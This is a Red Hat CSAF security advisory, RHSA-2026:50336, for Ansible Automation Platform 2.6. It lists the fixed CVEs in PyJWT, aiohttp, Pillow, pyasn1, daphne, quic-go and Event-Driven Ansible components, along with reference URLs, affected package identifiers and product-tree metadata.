| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Workaround
|
| URL | Category |
|---|---|
| https://access.redhat.com/errata/RHSA-2026:50336 | self |
| https://access.redhat.com/security/updates/classi… | external |
| https://docs.redhat.com/en/documentation/red_hat_… | external |
| https://docs.redhat.com/en/documentation/red_hat_… | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2467822 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2482734 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2484099 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2484377 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2484875 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2489127 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2497452 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2497455 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2497464 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2497466 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2500041 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2500043 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2500380 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2508155 | external |
| https://security.access.redhat.com/data/csaf/v2/a… | self |
| https://access.redhat.com/security/cve/CVE-2026-12383 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2489127 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-12383 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-12383 | external |
| https://access.redhat.com/security/cve/CVE-2026-18141 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2508155 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-18141 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-18141 | external |
| https://access.redhat.com/security/cve/CVE-2026-33811 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2467822 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-33811 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-33811 | external |
| https://go.dev/cl/767860 | external |
| https://go.dev/issue/78803 | external |
| https://groups.google.com/g/golang-announce/c/qcC… | external |
| https://pkg.go.dev/vuln/GO-2026-4981 | external |
| https://access.redhat.com/security/cve/CVE-2026-34993 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2484099 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-34993 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-34993 | external |
| https://github.com/aio-libs/aiohttp/commit/dcf40f… | external |
| https://github.com/aio-libs/aiohttp/security/advi… | external |
| https://access.redhat.com/security/cve/CVE-2026-40898 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2484875 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-40898 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-40898 | external |
| https://github.com/quic-go/quic-go/releases/tag/v0.59.1 | external |
| https://github.com/quic-go/quic-go/security/advis… | external |
| https://access.redhat.com/security/cve/CVE-2026-44545 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2484377 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-44545 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-44545 | external |
| https://github.com/django/daphne/blob/main/CHANGE… | external |
| https://access.redhat.com/security/cve/CVE-2026-48526 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2482734 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-48526 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-48526 | external |
| https://github.com/jpadilla/pyjwt/security/adviso… | external |
| https://access.redhat.com/security/cve/CVE-2026-54059 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2497464 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-54059 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-54059 | external |
| https://github.com/python-pillow/Pillow/blob/main… | external |
| https://github.com/python-pillow/Pillow/commit/0a… | external |
| https://github.com/python-pillow/Pillow/security/… | external |
| https://access.redhat.com/security/cve/CVE-2026-54060 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2497466 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-54060 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-54060 | external |
| https://github.com/python-pillow/Pillow/security/… | external |
| https://access.redhat.com/security/cve/CVE-2026-55379 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2497452 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-55379 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-55379 | external |
| https://github.com/python-pillow/Pillow/security/… | external |
| https://access.redhat.com/security/cve/CVE-2026-55380 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2497455 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-55380 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-55380 | external |
| https://github.com/python-pillow/Pillow/commit/f3… | external |
| https://github.com/python-pillow/Pillow/security/… | external |
| https://access.redhat.com/security/cve/CVE-2026-59197 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2500043 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-59197 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-59197 | external |
| https://github.com/python-pillow/Pillow/commit/cc… | external |
| https://github.com/python-pillow/Pillow/pull/9695 | external |
| https://github.com/python-pillow/Pillow/releases/… | external |
| https://github.com/python-pillow/Pillow/security/… | external |
| https://access.redhat.com/security/cve/CVE-2026-59885 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2500380 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-59885 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-59885 | external |
| https://github.com/pyasn1/pyasn1/commit/45bdb19eb… | external |
| https://github.com/pyasn1/pyasn1/releases/tag/v0.6.4 | external |
| https://github.com/pyasn1/pyasn1/security/advisor… | external |
| https://access.redhat.com/security/cve/CVE-2026-59886 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2500041 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-59886 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-59886 | external |
| https://github.com/pyasn1/pyasn1/commit/e60c691cb… | external |
| https://github.com/pyasn1/pyasn1/security/advisor… | external |
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for Red Hat Ansible Automation Platform 2.6\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Ansible Automation Platform provides an enterprise framework for building, deploying and managing IT automation at scale. IT Managers can provide top-down guidelines on how automation is applied to individual teams, while automation developers retain the freedom to write tasks that leverage existing knowledge without the overhead. Ansible Automation Platform makes it possible for users across an organization to share, vet, and manage automation content by means of a simple, powerful, and agentless language.\n\nSecurity Fix(es):\n\n* automation-controller: PyJWT: Authentication bypass due to forged JSON Web Tokens (CVE-2026-48526)\n* automation-eda-controller: ExternalEventStreamViewSet trusts Subject header without validation and leaks expected DN (CVE-2026-12383)\n* automation-eda-controller: Authentication bypass in Event-Driven Ansible via forged HTTP header (CVE-2026-18141)\n* automation-gateway-proxy: Go net package: Denial of Service via long CNAME response in LookupCNAME (CVE-2026-33811)\n* python3.12-aiohttp: Arbitrary code execution via untrusted input to CookieJar.load() (CVE-2026-34993)\n* python3.12-daphne: daphne: Denial of Service via excessive WebSocket message size (CVE-2026-44545)\n* python3.12-pillow: Denial of Service via crafted GD 2.x image file (CVE-2026-55380)\n* python3.12-pillow: Denial of Service via crafted BDF font file (CVE-2026-55379)\n* python3.12-pillow: Denial of Service via excessive memory allocation when processing font files (CVE-2026-54060)\n* python3.12-pillow: Denial of Service via crafted PCF font data (CVE-2026-54059)\n* python3.12-pillow: Native heap out-of-bounds write (CVE-2026-59197)\n* python3.12-pyasn1: Denial of Service via crafted ASN.1 REAL values (CVE-2026-59886)\n* python3.12-pyasn1: Denial of Service via crafted ASN.1 OBJECT IDENTIFIER (CVE-2026-59885)\n* receptor: quic-go: Denial of Service via excessive memory allocation in HTTP/3 trailers (CVE-2026-40898)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nFor details about this release, refer to the release notes listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:50336",
"url": "https://access.redhat.com/errata/RHSA-2026:50336"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6/whats_new-async_updates",
"url": "https://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6/whats_new-async_updates"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"url": "https://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade"
},
{
"category": "external",
"summary": "2467822",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467822"
},
{
"category": "external",
"summary": "2482734",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2482734"
},
{
"category": "external",
"summary": "2484099",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2484099"
},
{
"category": "external",
"summary": "2484377",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2484377"
},
{
"category": "external",
"summary": "2484875",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2484875"
},
{
"category": "external",
"summary": "2489127",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2489127"
},
{
"category": "external",
"summary": "2497452",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497452"
},
{
"category": "external",
"summary": "2497455",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497455"
},
{
"category": "external",
"summary": "2497464",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497464"
},
{
"category": "external",
"summary": "2497466",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497466"
},
{
"category": "external",
"summary": "2500041",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2500041"
},
{
"category": "external",
"summary": "2500043",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2500043"
},
{
"category": "external",
"summary": "2500380",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2500380"
},
{
"category": "external",
"summary": "2508155",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2508155"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_50336.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Ansible Automation Platform 2.6 Product Security and Bug Fix Update",
"tracking": {
"current_release_date": "2026-08-05T04:56:49+00:00",
"generator": {
"date": "2026-08-05T04:56:49+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "5.3.8"
}
},
"id": "RHSA-2026:50336",
"initial_release_date": "2026-08-04T18:56:41+00:00",
"revision_history": [
{
"date": "2026-08-04T18:56:41+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-08-04T18:56:41+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-08-05T04:56:49+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product": {
"name": "Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform:2.6::el9"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product": {
"name": "Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform_developer:2.6::el9"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product": {
"name": "Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform_inside:2.6::el9"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product": {
"name": "Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform:2.6::el10"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product": {
"name": "Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6-Developer-1.3",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform_developer:2.6::el10"
}
}
}
],
"category": "product_family",
"name": "Red Hat Ansible Automation Platform"
},
{
"branches": [
{
"category": "product_version",
"name": "ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"product": {
"name": "ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"product_id": "ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-dev-tools%2Bserver@26.7.2-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"product": {
"name": "ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"product_id": "ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-dev-tools@26.7.2-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"product": {
"name": "python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"product_id": "python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-tox-ansible@26.7.1-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"product": {
"name": "automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"product_id": "automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway@2.6.20260804-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"product": {
"name": "automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"product_id": "automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-config@2.6.20260804-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"product": {
"name": "automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"product_id": "automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-server@2.6.20260804-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"product": {
"name": "python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"product_id": "python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-django-ansible-base%2Bactivitystream@2.6.20260804-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"product": {
"name": "python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"product_id": "python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-django-ansible-base%2Bapi_documentation@2.6.20260804-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"product": {
"name": "python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"product_id": "python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-django-ansible-base%2Bauthentication@2.6.20260804-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"product": {
"name": "python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"product_id": "python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-django-ansible-base%2Bchannel_auth@2.6.20260804-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"product": {
"name": "python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"product_id": "python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-django-ansible-base%2Bfeature_flags@2.6.20260804-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"product": {
